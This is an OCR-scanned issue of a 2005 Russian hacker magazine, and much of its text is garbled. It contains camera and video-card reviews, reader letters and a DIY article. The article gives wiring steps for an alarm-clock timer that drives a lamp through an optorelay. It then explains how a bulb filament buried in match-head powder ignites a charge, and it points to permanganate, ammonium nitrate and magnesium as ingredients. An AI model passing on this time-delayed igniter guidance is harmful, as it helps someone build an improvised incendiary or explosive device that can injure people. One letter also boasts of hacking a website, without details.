зом и отразились на выс- 
тавленных нами конечных 
баллах. Общее впечатле- 
ние от работы с камерой в 
течение нескольких дней 


вылилось в оценку сфотоап- 


парата. Ну и, конечно, са- 
мое главное - это качество 
полученных снимков. 


TURBO сделает все за тебя. 
Работа с настройками вы- 
полняется через меню, кото- 
рое может показаться нес- 
колько своеобразным. 
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HARD | ФОТИКИ ДЛЯ. ) 


Фотокамера от Casio 
привлекает, в первую 
очередь, своими размерами. 
Занимая в кармане места 
чуть больше, чем кредитная 
карточка, она обладает неп- 
лохими характеристиками. 
Трехкратный оптический и 
четырехкратный цифровой 
зум позволят рассмотреть 
практически любой объект на 
достаточном удалении от 
оператора. Большой ЖК- 
дисплей, который выступает 
в роли видоискателя, имеет 
диагональ 2,7 дюйма и зани- 
мает практически всю зад- 
нюю стенку корпуса. Там же 
расположены элементы уп- 
равления, которых очень 


Технические характеристики: 
Размеры матрицы: 5,0 Мп, 
2560x1920 

Объектив: 3x оптический + 4x 
цифровой зум 

Носитель: карты SD/MMC; 9,3 
Мб встроено 

ЖК: 2.7" 

Формат: JPEG; видео: АМ 
(Motion JPEG) (320х240 15 
кадр/с); звук: WAV (моно) 


Цена: $400 


немного, - только самые необ- 
ходимые. Защитить всю 
электронную начинку приз- 
ван прочный алюминиевый 
корпус, который убережет 
электрическую схему при 
случайном падении и не go- 
пустит появления царапин, 


если ты часто носишь камеру 
в кармане вместе с ключами. 
Девайс обеспечивается 
энергией М-оп-аккумулято- 
ром, которого вполне хватит 
на несколько сотен снимков 
(только если ты не собира- 
ешься снимать постоянно в 
полной темноте). Предуста- 
новленных режимов съемки 
нет, но автоматика довольно 
успешно справляется со сво- 
ей задачей в любых услови- 
ях. Допускается возмож- 
ность ручной установки наст- 
poek, для чего потребуется 
воспользоваться настройка- 
ми меню. При каждом измене- 
нии параметра меню закры- 
вается и тем самым не позво- 
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ляет изменить несколько 
пунктов за один раз, что не 
очень удобно. Из необычного 
можно отметить возмож- 
ность создания НТМЁ-альбо- 
ма, который с flash'ku сразу 
выкладывается на страничку, 
плюс программирование кно- 
nok, наличие ффотокалендаря. 


FUJIFILM FINEPIX F455 


Взяв в руки этот Cpo- 

тоаппарат, начинаешь 
понимать, что — значит 
СТИЛЬ. Секрет простоты и 
привлекательности кроется 
в прямых линиях. И хотя уг- 
лы несколько скруглены, 
фотоаппарат выглядит пря- 
моугольным. Его корпус вы- 
полнен из пластика и имеет 
металлические вставки, ко- 
торые служат не только для 
декора, но и для дополни- 
тельной защиты. Такое со- 
четание материалов позво- 
лило снизить вес аппарата, 
что немаловажно для ком- 
пактных устройств. Минима- 
лизм во всем - сущность 
этого фотоаппарата. Загля- 
нув в меню, можно отметить 


Технические характеристики: 


Размеры матрицы: 5,2. Mn, 
2592x1944 

Объектив: 3,4х оптический 
зум + 4х цифровой 
Носитель: карты xD-Picture 
Сага; 16 Мб в комплекте 
ЖК: 2.0" 

Формат: JPEG; видео: AVI 
(Motion JPEG) (320х240 15 
кадр/с); звук: WAV (моно) 


Цена: $310 


простоту и удобство. Шесть 
сюжетных программ, среди 
которых присутствует одна 
с возможностью ручной ус- 
тановки параметров. 

Стоит отметить, что камера 
не позволит выставить вы- 
держку и диафрагму, но это 
компенсируется отличной 


автоматикой, которая сде- 
лает все за тебя. Скорости 
работы автофокуса будет 
достаточно, чтобы снять 
птицу в полете, - хороший 
результат работы электро- 
ники и механики. Практичес- 
ки во всех режимах съемки 
вспышка не лучшим обра- 
зом влияет на качество сро- 
то, за исключением портрет- 
ной съемки. Поэтому поста- 
райся сфотографировать не 
задействуя вспышку. 

Порадовала комплектация 
устройства. Имеющийся 
крэдл позволяет не только 
заряжать аккумулятор, не 
вынимая его из фотоаппа- 
рата (или подключая прово- 
да), но еще и скачивать 


снимки. Итого: быстрый, ка- 
чественный, удобный CDOTO- 
аппарат для активного 
пользователя. 


KONICA MINOLTA E50 


Взяв в руки Konica 
Minolta E50 и покру- 
тив его, ты по достоинству 
оценишь старания дизай- 
неров и инженеров. Стиль- 
ный корпус не допустил 
присутствия лишних кно- 
пок, однако ничто важное 
не было упущено. Большой 
ТЕТ-дисплей в 2,5 дюйма 
занимает практически всю 
заднюю панель и позволя- 
ет оценить сделанный кадр 
полностью. Помимо просто- 
го снимка, ты можешь вы- 
вести дополнительную ин- 
формацию о текущих наст- 
ройках и даже гистограмму. 
Присутствует возможность 
отключать дисплей при ра- 
боте, но зачем это сделано 


x 


Технические характеристики 
Размеры матрицы: 5,0 Мп, 
2560x1920 

Объектив: 3x оптический зум + 
4х цифровой 

Носитель: карты Secure Digital 
емкостью до 512 Мб 

ЖК: 2.5" 

Формат: JPEG; видео: АМ 


(640х480 или 320х240, 15 
кадр/с, моно) 


Цена: $300 


при отсутствии оптическо- 
го видоискателя, трудно 
сказать. 

Скорость работы ‹фотоап- 
парата порадовала: на nog- 
готовку к съемке камере 
потребуется всего около 
секунды после включения. 
Простое и понятное меню 


на русском языке облегчит 
работу с настройками. Нес- 
мотря на малые габариты, 
камера оснащена отлич- 
ным объективом, который 
не дает искажений. Став- 
ший уже стандартным для 
этого класса устройств 
трехкратный оптический 
зум работает четко и сла- 
женно с автоматической 
фокусировкой. 5-мегапик- 
селная матрица позволяет 
делать отличные снимки, 
но иногда грешит "зашум- 
ленностью" кадра при низ- 
кой освещенности. Воз- 
можность снимать видео с 
разрешение 640х480 сто- 
ит рассматривать как при- 


oF 


ятный бонус, но не как за- 
мену видеокамеры. 
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NIKON COOLPIX 5900 


Дизайн камеры 3Ha- 

ком всем, кто сталки- 
вался с линейкой камер 
COOLPIX от Nikon. Неизмен- 
ность форм, видимо, про- 
диктована хорошо проду- 
манной эргономикой. И 
действительно, металли- 
ческий корпус с выступом 
для правой руки можно 
только похвалить. Доступ- 
ы все элементы управле- 
ия, а увеличившийся go 
двух дюймов дисплей пора- 
дует высокой контраст- 
остью и четкостью отобра- 
жения. Это особенно замет- 
но при увеличении сделан- 
ого снимка. Кстати, устрой- 
ство умеет сохранять от- 
дельным кадром увеличен- 
ую область снимка прос- 
тым обрезанием лишнего. 


Технические характеристики: 


Размеры матрицы: 5,1 Mn, 
2592x1944 

Объектив: 3x оптический + 4x 
цифровой зум 

Носитель: карты SD; 13,5 Мб 
встроенной памяти 

ЖК: 2.0" 


Формат: УРЕС; видео: 
640x480, go 30 кадр/с 


Цена: $350 


Так как фотоаппарат рас- 
считан на новичков, в наст- 
ройках присутствуют 16 сю- 
жетных программ на все 
случаи жизни, которые ос- 
вобождают от ручной наст- 
ройки параметров съемки. 
Приятная функция D- 
Lighting облегчит работу с 
контрастными снимками, 
выравнивая яркость по все- 
му кадру. Среди режимов 


съемки присутствует даже 
установка подводной съем- 
ки, так что непромокаемый 
бокс будет очень кстати. 
Для того чтобы ты и в тем- 
ноте не терял навыков 
съемки, камера оснащена 
фотовспышкой и лампой 
подсветки автофокуса. На 
удивление хорошо работа- 
ет баланс белого в помеще- 
нии - большая редкость для 
фотоаппаратов этого клас- 
са. Из бонусов камеры сто- 
ит упомянуть возможность 
записи голосовых меток и 
функцию предупреждения 
плохой резкости кадра - 
очень полезно для 
Новичков. 


Камера от ГОЛ линейки 

F вооружена стильным 
дизайном и цельнометалли- 
ческим корпусом, который 
призван уберечь девайс от 
случайных повреждений. 
Большой ЖК-дисплей имеет 
защитное покрытие, которое 
снизит риск появления цара- 
пин на экране. Интересным 
можно назвать реализацию 
выходов видео, USB и пита- 
ния (на корпусе имеется всего 
один выход, к которому под- 
ключается разветвитель). Та- 
кая схема не лишена минусов: 
возможный износ коннекто- 
ра, перегибы проводов про- 
воцируют ухудшение контак- 
та, но при аккуратной эксплу- 
атации переходник проживет 


Технические характеристики: 
Размеры матрицы: 6,3 Мп, 
2848х2136 

Объектив: 3x оптический + 6х 
цифровой зум 

Носитель: карты xD; 16 Мб в 
комплекте 


ЖК: 2.5" 


Формат: JPEG; видео: AVI 
(640х480 или 320х240, 
30 кадр/с) 


Цена: $380 


не меньше сротоаппарата. Уп- 
равление радует продуман- 
ностью, но немного огорчает 
отсутствие поддержки рус- 
ского языка в меню. 

Особенность камеры - матри- 
ца с чувствительностью в 
1600 единиц 150, что не харак- 
терно для аппаратов такого 
класса. Предустановленных 


сюжетных программ немного: 
дневной свет, портрет, пей- 
заж, спорт и ночная съемка. 
Причем последняя задирает 
чувствительность матрицы 
go предела, и лучше пользо- 
ваться ручными настройками 
при съемке в темное время 
суток. К сожалению, камера 
не позволяет выставлять же- 
лаемые значения диафрагмы 
и ручной фокусировки. На от- 
куп хозяину дана возмож- 
ность выставлять выдержку 
при съемке со штатива. К 
плюсам можно отнести хоро- 
шо работающую функцию 
коррекции "красных глаз" - 
пожалуй, это единственная 
камера в обзоре, которая 
справилась с данной задачей. 


PENTAX OPTIO $5Н 


Pentax optio 55п очень 
напоминает своих Npeg- 
шественников из линейки 
Optio. Тот же дизайн, те же ли- 
нии, TOT Же надежный алюми- 
ниевый корпус. Не сильно вы- 
дающиеся из корпуса кнопки 
легко нажимаются, но гаранти- 
руют отсутствие случайных 
кликов. Защищенный двух- 
дюймовый ЖК-дисплей доста- 
точно инфрормативен. 

Встроенный Li-lon-akkymyns- 
тор не отличается большой 
выносливостью, но радует Ma- 
лым временем, которое требу- 
ется для его заряда. Аккумуля- 
тор можно заряжать как от- 
дельно от фотоаппарата, так и 


Технические характеристики: 


Размеры матрицы: 5,0 Мп, 
2560x1920 


Объектив: 3x оптический + 6х 
цифровой зум 

Носитель: карты SD 

ЖК: 2.0" 

Формат: JPEG; видео: MPEG4 


Цена: $345 


не вытаскивая его, то есть при 
помощи док-станции. Кстати, 
предоставляемая в комплекте 
док-станция имеет контакт для 
дополнительного аккумулято- 
ра, что явно понравится люби- 
телям снимать много и часто. В 
темноте автофокусу помогает 
лампа подсветки, а вспышка 
работает очень хорошо, не пе- 


ресвечивая объекты. К плю- 
сам можно отнести ито, что эта 
камера является одной из са- 
мых легких, даже с аккумуля- 
тором и Наз-картой. 

Ложку дегтя влил меркнущий 
экран и "недолговечный" акку- 
мулятор. Ну а о качестве изго- 
товления электроники и опти- 
ки можно судить уже по тому, 
что камера от компании 
Pentax. 


a) и 


x 
= 
= 
о 
- 
6 
6 
о 


4 
5 
= 
о 
| 
8 
8 
о 


GENT HARDY сотикидля. 


OLYMPUS [MJU:] DIGITAL 500 


x 


Всепогодный фото- 

аппарат от Olympus 
предназначен для ежед- 
невного пользования. Со- 
ответственно, он должен 
быть защищен от стихии, 
что и реализуется на базе 
крепкого, надежного ме- 
таллического корпуса, ди- 
зайн которого исполнен а- 
ля пленочные "мыль- 
ницы". 
Управление реализовано 
достаточно грамотно, но 
немного смущает отсут- 
ствие русского языка в 
настройках меню. Так как 
фотоаппарат предназна- 
чен для частого использо- 
вания по принципу "достал 
из кармана, нажал на 
спуск", камера оснащена 
целым арсеналом предус- 
тановленных настроек - их 
аж 20 штук. Среди прог- 
рамм присутствует даже 
такая экзотика, как подвод- 


Технические характеристики: 


Размеры матрицы: 5,0 Мп, 
2560x1920 

Объектив: 3x оптический + 4x 
цифровой зум 

Носитель: карты xD; 32 Мб в 
комплекте 

ie 

Формат: JPEG; видео: 
QuickTime (320х240 или 


160x120, 15 кадр/с); звук: WAV 
(моно) 


Цена: $310 


ная макросъемка и съемка 
портрета при свечах. Отсут- 
ствие ручных настроек не 
очень огорчает: нам на от- 
куп дана возможность ус- 
танавливать экспокоррек- 
цию и баланс белого. Рабо- 
ту оптики и матрицы можно 
считать удачной, если нем- 
ного уменьшить чувстви- 
тельность с 400 единиц 
ISO, которые выставляет 
автоматика. Приятно уди- 
вила работа вспышки: она 
равномерно освещает объ- 


екты даже при макросъем- 
ке. Кстати, фотоаппарат 
обладает функцией Super 


Масго, которая позволяет 
снимать объекты уже с се- 
ми сантиметров. 


«2.9.9.9. 


SAMSUNG DIGIMAX V700 


Дизайн SAMSUNG 

Digimax V700 стоит 
охарактеризовать как нео- 
жиданный и выразитель- 
ный. От компактного фото- 
аппарата принято требо- 
вать скорости, легкости и 
побольше мегапикселов, 
но никак не изысков. Эта 
камера прекрасна не толь- 
ко своим дизайном, но и 
возможностью выбрать 
одно из трех цветовых ре- 
шений для корпуса: с сини- 
ми, красными или сереб- 
ристыми панельками. Об- 
текаемый корпус оказался 
не только красивым, но и 
удобным: камера надежно 
фиксируется в руках бла- 
годаря удачному покры- 
тию и небольшому высту- 
пу с рельефными точками. 
Элементы управления рас- 
положены таким образом, 


Технические характеристики: 


Размеры матрицы: 7,1 Мп, 
3072х2304 

Объектив: 3x оптический + 10x 
цифровой зум 


Носитель: карты $0, ММС 


ЖК: 2.0" 


Формат: JPEG, TIFF; видео: AVI 
(МРЕС-4), (640x480, 
30 кадр/с); звук: WAVE 


Цена: $380 


что возникает необходи- 
мость работать с камерой 
двумя руками. Но по про- 
шествии времени, разоб- 
равшись с настройками, ты 
доверишь большинство 
установок автоматике или 
предустановленным зна- 
чениям. Все меню переве- 
дено на русский язык, что 
значительно облегчит зна- 
комство с фотоаппаратом. 
Автоматика заслуживает 
всяческой похвалы, назва- 


ния режимов соответству- 
ют реальным условиям, 
что следует понимать как: 
режим "Ночь"- оптималь- 
ные значения выдержки и 
диафрагмы. В результате 
работа сводится к выбору 
необходимого режима и 
наведению на объект. Так- 
же автоматика предупре- 
дит о возможном ухудше- 
нии снимка, если присут- 
ствуют вибрации. Качест- 
венная оптика и 7-мегапик- 
селная матрица стремятся 
к отличному качеству 
снимков. Несколько огор- 
чил автофокус, который 
как-то неуверенно и не 
всегда точно выставлял 
необходимое значение 
резкости. 


«9.9.9.9. 


DITORS' 
_ ¢ CHOICE 


2005 


вывод 

Рынок цифровых фото- 
камер практически без- 
донный. На смену круп- 


ным и дорогим монстрам 


приходят компактные 
карманные сфотоаппара- 
ты, имеющие характерис- 
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тики, которые повышают- 
ся в несколько раз всего 
за нескольких лет. Спрос 
на такие камеры повыша- 
ется, и компании-произ- 
водители с радостью за- 
полняют рынок. Сегодня 
"выбором редакции" мы 


награждаем камеру SAM- 
SUNG Digimax V700 - хо- 
роший дизайн, насыщен- 
ность функциями и от- 
личная работа автомати- 
ки. Приз "Лучшая покуп- 
ка" присуждается камере 
Nikon Coolpix 5900. Co- 


вершенствование элект- 
роники и постоянство 
внешности камер найдут 
отклик в сердцах покупа- 
телей. Качество снимков 
неуклонно повышается - 
все благодаря техничес- 
кому прогрессу. 


Сергей Никитин, Дмитрий Шамаев, test_lab (tes 


БЫТЬ 


MSI МХ 7800GTX 


Что может быть луч- 
ше, чем делать подар- 
ки себе? Наверное, 
только получать 
их от других, 
но если у те- 
бя не предвидится никакого 
праздника, то придется по- 
заботиться о подарке самос- 
тоятельно. Естественно, это 
будет компьютерная желез- 
ка, а не плюшевый зайчик 
или мишка. Причем железка не 
простая, а очень крутая - новейшая 
видеоплата от компании MSI, постро- 
енная на самом совершенном чипсете 
от компании NVidia. Итак, встречаем 
MSI МХ 7800GTX! 

Если ты будешь покупать эту плату 
в коробочном, а не ОЕМ-варианте (по- 
чему нужно делать именно так, я по- 
ясню ниже), то сразу почувствуешь 
заботу производителя о тебе люби- 
мом: плата упакована в удобную ком- 
пактную коробку с ручкой для пере- 
носки. Внутри, помимо платы, ты най- 
дешь игру Chronicles of Riddick: Escape 
from Butcher Вау (Ha пяти дисках), а 
также набор полезных утилит от MSI. 
Там есть софт для автоматического 
обновления драйверов и BIOS'a пла- 
ты, ее безопасного разгона, програм- 
мы для защиты файлов и еще много 
всего интересного. Также в комплект 
любезно подложены всякие нужные 
кабели и коннекторы. 

Кроме как посредством разгона, 
производительность системы, в кото- 
рой будет установлена эта плата, 
можно повысить предоставив ей gpy- 
га, то есть прикупив аналогичное уст- 
ройство и включив режим SLI, кото- 
рый поддерживает эта плата. Произ- 
водительность поднимется на недося- 
гаемую высоту, но и цена такого ре- 
шения будет витать в районе обла- 
ков. Впрочем, если системная плата 
поддерживает режим SLI, к этому ре- 
шению можно будет прибегнуть впос- 
ледствии, когда скорости одной платы 
будет уже не хватать, а сами устрой- 
ства подешевеют. 

Момент, когда производительности 
этого устройства станет недостаточно, 


наступит 
явно не скоро, и 
чтобы убедиться в 
этом, достаточно взглянуть 
на результаты наших тестов. Да, 
при включении антиалиэйсинга и ани- 
зотропии количество fps уменьшает- 
ся, но их остается вполне достаточно 
для нормальной игры. Так что смело 
запускай свой любимый шутер и вы- 
ставляй в нем максимальные грабри- 
ческие настройки. 

Такие выдающиеся параметры про- 
изводительности этой платы обеспе- 
чиваются ее начинкой - графическим 


Технические характеристики: 
Ядро: nVidia NV47 (G70) 

Количество пикселных конвейеров, шт: 24 
Шина памяти, бит: 256 

Объем памяти, M6: 256 

Частота ядра, МГц: 430 

Частота памяти, МГц: 600 (1200) 
Тип памяти: GDDR-3 
Латентность памяти, нс: 1,6 
Техпроцесс ядра, мкм: 0,11 

VIVO: есть 

Выходы: DVI, DVI, TV-Out 


ПО в комплекте: Chronicles of Riddick: Escape 
from Butcher Bay 


Тестовый стенд: 
Материнская плата: Asus PSAD2-E Premium 


Процессор: Intel Pentium 4 EE 3,73 
Память: 4x512 Мб Corsair DDR-2 3-2-2-8 
Kynep: Zalman CNPS7700 Cu 

Жесткий диск: Western Digital WD200 
Блок питания: 480 Вт Thermaltake 


про- 
цессо- 
ром на 
ядре 
NV47, в ко- 
тором содер- 
жится 24 пиксел- 
ных конвейера, 

256 Мб быстрой гра- 
фической памяти 
GDDR3, шина данных шириной 256 
бит и высокие частоты работы ядра 
(430 МГц) и памяти (1200 МГц). По 
этим параметрам, как и по конструк- 
ции системы охлаждения, плата ни- 
чем не отличается от референсного 
устройства. 

Для соединения с ПК есть два порта 
DVI, гнезда VIVO и TV-Out. Не стоит 
забывать, что для работы плате тре- 
буется дополнительное питание (один 
коннектор), а следовательно, мощный 
и качественный БП. Да и корпус луч- 
ше освободить от всего лишнего, так 
как габариты у платы немаленькие. А 
что ты хотел? За такую производи- 
тельность нужно платить. И если ты 
согласен сделать это, то обретешь 
мощнейшее устройство, которое обес- 
печит превосходно качественную и 
скоростную картинку на мониторе. 
Также ты получишь массу удоволь- 
ствия и таким способом: беседа с 
друзьями, описываешь то фантасти- 
ческое количество fps и попугаев, ко- 
торое тебе удалось получить, в этот 
момент выражения лиц друзей стано- 
вятся такими, что ты чувствуешь себя 


Богом. 


оффтопик 


(И HARD] паяльник ) 


Lundes (lunde@mail.ru) 


ПАЯЛЬНИК 


ТАЙМЕР С "ВОЛШЕБНОЙ" ЛАМПОЧКОЙ 


этой статье я проведу экскурс в химию и электронику, расскажу, как сделать таймер, который можно использовать в различных 
прикладных и «прикольных» целях. Я ни в коем случае не призываю использовать этот таймер в каких-либо противозаконных 
целях: поверь мне, подобным вещам можно найти много применений в хозяйстве. 


ь- 
5 
= 
о 
= 
8 
6 
о 


Сети множество ре- 
цептов различных пи- 
ротехнических сме- 
сей. Я не советую экс- 
периментировать с 
"хлопушкой из хозмага" или подоб- 
ными рецептами из интернета: сме- 
си ужасно неустойчивые и опасные. 
Я понял это давным-давно, когда 
приобрел от такой дряни химичес- 
кий ожег на лице и потерял часть 
подушечки пальца. Этот случай и 
натолкнул меня на мысль о созда- 
нии надежного таймера. 


СХЕМА 
Все гениальное просто. Но стоит 
обманывать себя - все не так прос- 
то, как кажется на первый взгляд. 
Схема действительно несложная. 


Чтобы не усложнять ничью жизнь, практически с любым будильником. 500 МА в зависимости от лампы. Не 
я использовал современное опторе- Для таймера подойдут оптореле из все микросхемы 293-й серии держат 
ле 293-й серии. списка: КР?ЭЗКГПА, КР2ЭЗКПРА, ток более 200 МА, поэтому выбира- 

Это позволило, во-первых, исполь- КР29ЗКПЗА, КР2ЭЗКПАА, ем микросхемы с индексом "А" в 
зовать минимум деталей, что увели- KP293KI15A и т.д., КП6А, КПТА, конце маркировки. 
чило надежность и улучшило пов- КПЗА, КПЭА, КГТОА. Дело в том, что Оптореле могут быть двунаправ- 
торяемость схемы. Во-вторых, сде- нагрузкой нашего таймера будет ленными (KP2Z93KI13A) и полярными 
лало схему более универсальной, лампа накаливания. Выхобной TOK (КРРЭЗКПРА). Отличие в том, что в 
то есть ее можно использовать реле будет составлять от 100 мА go первом случае полярность подклю- 

чения нагрузки не имеет значения, 


в м а во втором случае необходимо соб- 
людать полярность. Например, если 
вместо КРРЭЗКПЗА собираешься 
использовать КР2ЭЗКПРА, то шес- 
той контакт будет вместо восьмого 


НЕОБХОДИМЫЕ 


КОМПОНЕНТЫ 
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и пятая нога микросхемы вместо 
седьмой. 

В роли таймера будет выступать 
любой электронный будильник, нап- 


ример советского или китайского 
производства, модифицированный 
под наши цели. Если разобраться в 
схемотехнике таких девайсов, то у 


Тумблер необходим для того, 
чтобы обезопасить себя во время 
взвода таймера. 


БЕЗОПАСНО 


всех них выходная цепь звукового 
излучателя представляет собой 
транзистор, нагруженный пьезоиз- 
Лучателем или микродинамиком. 

Эту особенность построения мы и 
будем использовать. 

Первым делом необходимо уда- 
лить излучатель. Аккуратненько 
выпаиваем его. С помощью мульти- 
метра в режиме прозвонки находим 
контакт, которым он был подключен 
к плюсу батарей питания. 

К этому контакту подключаем вы- 
вод 2 микросхемы, к другому кон- 
такту подцепляем вывод 1 микросхе- 
мы. Теперь, как только наступит 
время Х, на излучающий диод опто- 
реле начнут поступать импульсы, 
которые будут управлять выходной 
цепью реле. Лампа начнет мигать. В 
принципе, лампа может быть на лю- 
бое напряжение, но так как на схе- 
ме батарея 9 вольт, то и лампочку 
выбирай на напряжение, большее 
девяти вольт или равное им. 

Тумблер необходим gna того, что- 
бы обезопасить себя во время 
взвода таймера. Многие будильники 
обладают способностью пищать в 
самый неподходящий момент: при 
нажатиях кнопок, например. 

Чтобы было понятно, в каком по- 
ложении находится тумблер, и лиш- 
ний раз обезопасить весь процесс 
взвода таймера, введена цепочка 
из резистора R сопротивлением 
2 кОм и светодиода VD. При светя- 
щемся огоньке цепь замкнута и го- 
това к работе. От винта! 

Советую собирать все "на весу" 
отрезками монтажного провода, ис- 
пользуя термоусадочную трубку, и 
не жалеть изоленты. Необходимо 
заизолировать каждый контакт: ес- 
ли случайно замкнешь, то у нашего 
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"Будильник" взведен на 10:05 


И никакой таймер не помог. 
Вот это хлопнуло!! 


Схема в сборе 
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журнала может стать Ha одного чи- 
тателя меньше. 

Если будет необходимо произвес- 
ти испытания таймера, рекомендую 
приобрести держатель для лампо- 
чек и вкручивать новые по мере их 
выхода из строя. 

Выбор деталей некритичен. В слу- 
чае использования других оптореле 
из 293-й серии необходимо уточ- 
нить их "поножовщину", или, как 
еще говорят, распиновку - значе- 
ние каждого контакта. 

Резистор желательно малогаба- 
ритный - 0,125; 0,25 Вт. Значение 
сопротивления тоже некритично: от 
1 кОм go 5 кОм. От резистора зави- 
сит только яркость свечения свето- 
диода и время жизни батарейки. 

Паяльник в руки и за дело! 


"ВОЛШЕБНАЯ" ЛАМПОЧКА 

= Только я тебя умоляю: не посту- 
пай, как сделали перцы из группи- 
ровки "Рога и Копыта", когда они 
аккуратно раскололи стеклянную 
колбу лампочки, погрузили спираль 
накаливания в толченные спичеч- 
ные головки, потом заложили все 
это в хлопушку такой мощности, что 
им оторвало конечности. И никакой 
таймер не помог. Вот это хлопнуло!!! 

Они использовали похожую схему 
для поджога своей химии. 

"Какой еще химии?" - спросишь ты. 

Хочется ответить "RTFM или читай 
учебники", если не довелось 
сделать это еще на школьной 
скамье ;-). Еще в учебниках химии 
приводится красочный эксперимент 
по горению магния, а если фор- 
мально: по окислению магния кис- 
лородом воздуха. Также известно, 
что окислителем намного активнее 
кислорода может быть калия пер- 
манганат или аммиачная селитра, то 
есть обычная сухая марганцовка из 
аптеки или удобрение из хозяй- 
ственного магазина - в общем, дер- 
зай, у тебя огромный простор для 
творчества, причем не только тех- 
нического! Хотя, что-то я чересчур 
увлекся, верно? 

Ведь все это уже далеко от рубри- 
ки "Паяльника", так что RTFM или 
читай учебники, и да пребудет с то- 
бой Великая Сила, и да поможет она 


тебе в вечной борьбе со Злом! 


надрать коллег в Counter-Strike ипи Quake 32 
попасть на зарубежный турнир? 

замутить собственный чемпионат? 
выиграть навороченный автомобиль? 

стать крутым киберспортсменом? 
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OT: АЛЕКСАНДР ПАСЯДА OT: DEVID [KOLYAN_KOC@MAIL.RU] 
[OBL_GAZ@BK.RU] ТЕМА: ПРИВА ВАМ ХАЦКЕРЫ... 
Если будете публиковать, то уж это точно не Здоровеньки буллы, хакеры... Огромный вам РЕСПЕКТ за ваш журнал... Он просто 
[>> нужно: Кульный... Можно его назвать библией начинающих хцкеренышей... Короче, не 
1) Видно, не любит ваша почта Яндекс. буду вас расхваливать, вам и так каждый день такие письма Гигами, наверно, приходят... 
Письмо возвращало назад, так что я по ошибке Итак... Недавно я лазил по нету в поиске...))) смешно сказать чего... Сайта с уста- 
отправил ero Dr.Klouniz'y. новленным С0$М0-СНАТом, с целью поиметь этот самый сайт...))). Просто хотел про- 
2) Dr.Klouniz! Осторожнее с клюквенной настойкой ;)! верить способ взлома... В общем, я набрел на сайт некого MrMihona. И что же я уви- 
--- дел в его гостевой книге? Я увидел, что этот ламер пытается писать лажовые статьи 
Здоровеньки, товарищи! про хак, с кем-то цапаться, рассылать наидревнейшие трояны по мыльницам поль- 
В номер о видео просочилось серьезное заблуж- зователей и прикрываться во всем этом... ВАМИ!! Я чуть в осадок не выпал, когда 
дение, которое было видно даже с орбиты и вызвало это увидел... сайты его www. flai.h14.ru and www. flai.nm.ru. Так что я хотел спросить- 
там живой интерес. то?.. Действительно ли вы являетесь крышой этого ламера, если да, то почему??? 
Дружище Modificator в рубрике FAQ писал: "В Poc- Ero сайт я, конечно, поимел... но все же ответьте на вопрос... 
сии используется стандарт видеоданных PAL. В неми 
производи монтажные работы" ;(. В России исполь- ОТВЕТ: 
зуется CEKAM типа D (или, что то же самое, К). Заб- Спасибо, ты тронул мое задубевшее сердце своим добрым словом! 
луждаться так серьезно можно разве что перепутав Нет, друг мой, ламеров мы не крышуем, долги не возвращаем и не 
просто СЕКАМ с системой МЕСЕКАМ, которая как раз встраиваем в счетчик такие проволочки, из-за которых он потом на- 
используется на Ближнем Востоке и в Северной А- чинает крутиться в противоположную сторону и энергетики оказыва- 
puke. MESECAM или SECAM-H, SECAM/Horisontal (Hold) - ются вам должны. Tak что за очищение мира OT смрадного духа ламе- 
CEKAM/H с синхронизацией цвета по строкам. рства мы выражаем тебе респект. Читай наш журнал и познай Дао. 


Я на него тоже один раз попал, проиграл получив- 
шееся на видике - вся цветность зафаршмачилась. 
Понятно, что ПАЛ лучше совместим с СЕКАМом, чем 
NTSC, вот Modifikator и заводит рака за камень. (А 
может, это коварные происки буржуинов, которые, 
пропагандируя свои стандарты, законспирировали 


OT: МАХТАХМУЕ 221 [NAXTAXNIYEZZI@NAROD.RU] 


ТЕМА: ВОПРОС ПО АНКЕТЕ 


МЕСЕКАМ nog СЕКАМ, а Modifikator нарвался на nog- Здравствуйте, сотрудники журнала хакерзрес. 
мену). Но когда нет СЕКАМа в оборудовании, прихо- У меня вопрос по анкете, которую Вы предлагаете в журнале за май. 
дится работать с ПАЛом. Расскажите, пожалуйста, подробнее, что значит требование "быть в онлайне", 

А теперь то, что с орбиты не было замечено. Слово насколько активно должно быть участие в тест-группе, чтобы оно было засчитано 
"терия" на обложке, уверен, понял каждый. Но в как постоянное и вознаграждено бесплатной подпиской, и, самое главное, на сколь- 
следующий раз вы там смотрите в оба. Успеха вам в ко месяцев рассчитана эта бесплатная подписка? 
каждом деле! Я готов поучаствовать, но не хочу впустую терять время и желаю четко знать, за 

что я буду стараться :). 
ОТВЕТ: 

Секам-месекам, павлин-мавлин... С вами ОТВЕТ: 
без клюквенной настойки не разберешься, Тест-группа - это занятие для настоящих, не побоюсь этого слова, 
товарищ. А говоришь, "не употребляй" :(. мужиков. "Быть в онлайне" - это еще не все. Для того чтобы "быть в 
Прямо скажем, твое сообщение я не осилил онлайне", нужно электричество. Поэтому тест-группа у нас поделена 
целиком. Вернее, осилил, но по диагонали, и на две части, которые ротируются между двумя частями редакции - 
понял из него, что в чем-то мы накосячили, энергоподвалом и мозговысасывательным центром. В энергоподвале 


стоит оригинальная динамо-машина, воссозданная по забытым чер- 
тежам (да, он все же оставил чертежи) Николо Теслы, а в мозговыса- 
сывательном центре - Великие Машины, созданные с использовани- 
ем технологий пришельцев. С помощью этих чудо-колпаков мы выса- 
сываем из мозга тестируемых читателей все их самые темные и злые 
желания, которые потом реализуем в нашем журнале. Конечно, в 
этот момент вторая группа тестеров трудится в подвале и вращает 
гигантский ротор динамо-машины Тесла, вырабатывая по 3 млн. 
КВт/ч. Вот, вкратце, и весь секрет нашей тест-группы. 


причем, самое главное, я тут ни при чем :). 
Это Андрюшин автор, видимо, изрыгнул дан- 
ный перл. Но не беда: Андрюша go него go- 
берется. Он проникнет туда, где он беззащи- 
тен - в его сны. Раз. Два. Андрюша заберет 
тебя :(. 


ХАКЕРСПЕЦ | 09(58)| 2005 


OT: OT JOYA [D.J.JOY@MAIL.RU] 


TEMA: PREDLOJENIE 


Здравствуйте, "хакерюги". У меня вопрос и предложение. Некоторые проги из пре- 

доставленных на дисках якобы халявные, но на самом деле просто с оценочным пе- 
риодом, по окончании которого софтина требует заплатить №-ное кол-во. Так вот я про что: 
почему бы вам вместе с этим софтом не выкладывать и крэки к ним, а то, я думаю, не все та- 
кие умные, чтобы писать самим кряки. Заранее благодарен. JOY. 


ОТВЕТ: 

Привет тебе, о Первый Парень на Деревне. Поздравляю тебя: ты - стоты- 
сячный креативщик, который выдвинул данное предложение. Я уже устал 
плакать над этими предложениями - мне уже не хватает слез, и глаза мои 
красны :(. В общем, подумай на досуге об особенностях оплаты труда и по- 
читай Адама Смита и Карла Маркса. 


